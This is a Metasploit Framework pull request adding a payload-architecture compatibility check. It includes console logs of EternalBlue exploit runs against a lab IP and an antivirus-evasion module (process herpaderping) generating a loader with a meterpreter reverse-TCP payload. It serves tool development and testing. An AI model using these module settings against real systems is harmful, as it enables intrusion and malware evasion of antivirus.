Closed zeroSteiner closed 4 weeks ago
Working through the unit test failures right now.
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.5.135.201 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using
-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2
008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass test no (Optional) The password for the specified username
SMBUser test no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008
R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Window
s 7, Windows Embedded Standard 7 target machines.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] 10.5.135.201:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 10.5.135.201:445 - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 10.5.135.201:445 - Scanned 1 of 1 hosts (100% complete)
[-] 10.5.135.201:445 - The target is not vulnerable.
^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_eternalblue) > use evasion/windows/process_herpaderping
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 evasion(windows/process_herpaderping) > show options
Module options (evasion/windows/process_herpaderping):
Name Current Setting Required Description
---- --------------- -------- -----------
ENCODER no A specific encoder to use (automatically selected if not set)
FILENAME cWsCIIJEj.exe yes Filename for the evasive file (default: random)
REPLACED_WITH_FILE %SystemRoot%\System32\calc.exe no File to replace the target with. If not set, the target file will
be filled with random bytes (WARNING! it is likely to be caught by
AV).
WRITEABLE_DIR %TEMP% yes Where to write the loader on disk
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Evasion target:
Id Name
-- ----
0 Microsoft Windows (x64)
View the full module info with the info, or info -d command.
msf6 evasion(windows/process_herpaderping) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 evasion(windows/process_herpaderping) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 evasion(windows/process_herpaderping) > run
[+] cWsCIIJEj.exe stored at /home/tmoose/.msf4/local/cWsCIIJEj.exe
msf6 evasion(windows/process_herpaderping) >
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.5.135.201 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using
-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2
008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass test no (Optional) The password for the specified username
SMBUser test no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008
R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Window
s 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[-] 10.5.135.201:445 - Exploit failed: windows/meterpreter/reverse_tcp is not a compatible payload.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_eternalblue) > use evasion/windows/process_herpaderping
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 evasion(windows/process_herpaderping) > show options
Module options (evasion/windows/process_herpaderping):
Name Current Setting Required Description
---- --------------- -------- -----------
ENCODER no A specific encoder to use (automatically selected if not set)
FILENAME qRLJaTgIRR.exe yes Filename for the evasive file (default: random)
REPLACED_WITH_FILE %SystemRoot%\System32\calc.exe no File to replace the target with. If not set, the target file will
be filled with random bytes (WARNING! it is likely to be caught by
AV).
WRITEABLE_DIR %TEMP%\gvfrl.exe yes Where to write the loader on disk
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Evasion target:
Id Name
-- ----
0 Microsoft Windows (x64)
View the full module info with the info, or info -d command.
msf6 evasion(windows/process_herpaderping) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 evasion(windows/process_herpaderping) > run
[-] evasion failed: windows/meterpreter/reverse_tcp is not a compatible payload.
msf6 evasion(windows/process_herpaderping) >
This PR fixes a bug where a user can specify an invalid payload architecture for a given exploit target. Previously, it was not possible to tab-complete an invalid payload, but this enforces the architecture limitations with a run-time exception before sending the exploit.
This updates the exploit and evasion module drivers to use
#compatible_payloads
to ensure that the selected payload is compatible with the module before running it. The previous check would only inspect the platform and not the architecture. This also means that only payloads that can be tab completed can be selected, making the behavior more consistent.Also, this means that as an exploit author now, when the target is defined to a particular platform and architecture combination, there's a guarantee that the payload instance matches what was defined. If there are instances where the user needed to select other values, then it's likely that the module's target definition is incorrect.
Verification
In both of these test cases, the payload module name must be fully specified and can not be tab completed.
exploit/windows/rdp/cve_2019_0708_bluekeep_rce
with a payload that matches the platform but is of an incorrect architecture (ARCH_X86 in this case). See that the module fails stating that the payload is incompatible.evasion/windows/process_herpaderping
with a payload that matches the platform but is of an incorrect architecture for the target. See that the module fails, stating that the payload is incompatible.